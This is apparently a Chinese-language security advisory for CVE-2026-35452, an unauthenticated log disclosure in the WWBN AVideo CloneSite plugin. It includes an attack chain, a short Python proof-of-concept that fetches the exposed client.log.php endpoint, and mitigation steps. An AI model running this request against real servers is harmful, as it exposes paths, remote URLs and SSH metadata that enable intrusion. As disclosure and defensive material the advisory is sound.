CVE-2026-35452 CVSS 5.3 中危

CVE-2026-35452 AVideo信息泄露漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35452

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo 26.0及更早版本存在信息泄露漏洞。CloneSite插件的client.log.php端点未进行身份验证，直接暴露了克隆操作日志。攻击者无需登录即可访问该文件，获取内部文件路径、远程服务器URL及SSH连接元数据等敏感信息，为进一步攻击提供数据支持。

技术细节

该漏洞位于WWBN AVideo的CloneSite插件中，具体受影响文件为`plugin/CloneSite/client.log.php`。与该目录下其他严格实施`User::isAdmin()`权限校验的端点不同，`client.log.php`直接读取并输出克隆操作的日志文件，而未进行任何身份验证或权限检查。攻击者无需用户交互，仅需构造简单的HTTP GET请求即可访问该端点。日志文件内容包含了高度敏感的系统内部信息，如服务器文件系统的绝对路径结构、第三方远程服务器的完整URL地址以及SSH连接相关的元数据（可能包含凭据）。这些信息的泄露不仅暴露了系统架构，还可能直接导致SSH服务遭受暴力破解或未授权访问，从而完全接管服务器，构成严重的安全风险。

攻击链分析

STEP 1

侦察

攻击者识别出目标服务器正在运行WWBN AVideo平台，且版本在26.0及以下。

STEP 2

利用

攻击者向`/plugin/CloneSite/client.log.php`端点发送未经授权的HTTP GET请求。

STEP 3

信息泄露

服务器响应请求，直接返回包含文件系统路径、远程URL和SSH元数据的日志文件内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL containing the vulnerable endpoint
# Replace with the actual target address
target_url = "http://target-ip/plugin/CloneSite/client.log.php"

try:
    # Send a GET request without authentication headers
    response = requests.get(target_url, timeout=10)

    # Check if the request was successful
    if response.status_code == 200:
        print("[+] Exploit Successful! Sensitive log content:")
        print(response.text)
    else:
        print(f"[-] Exploit Failed. Status Code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

如果无法立即升级，建议管理员在服务器上直接删除或重命名`plugin/CloneSite/client.log.php`文件，或者通过Web服务器配置（如Nginx/Apache的访问控制规则）禁止对该路径的公网访问，以阻断信息泄露途径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表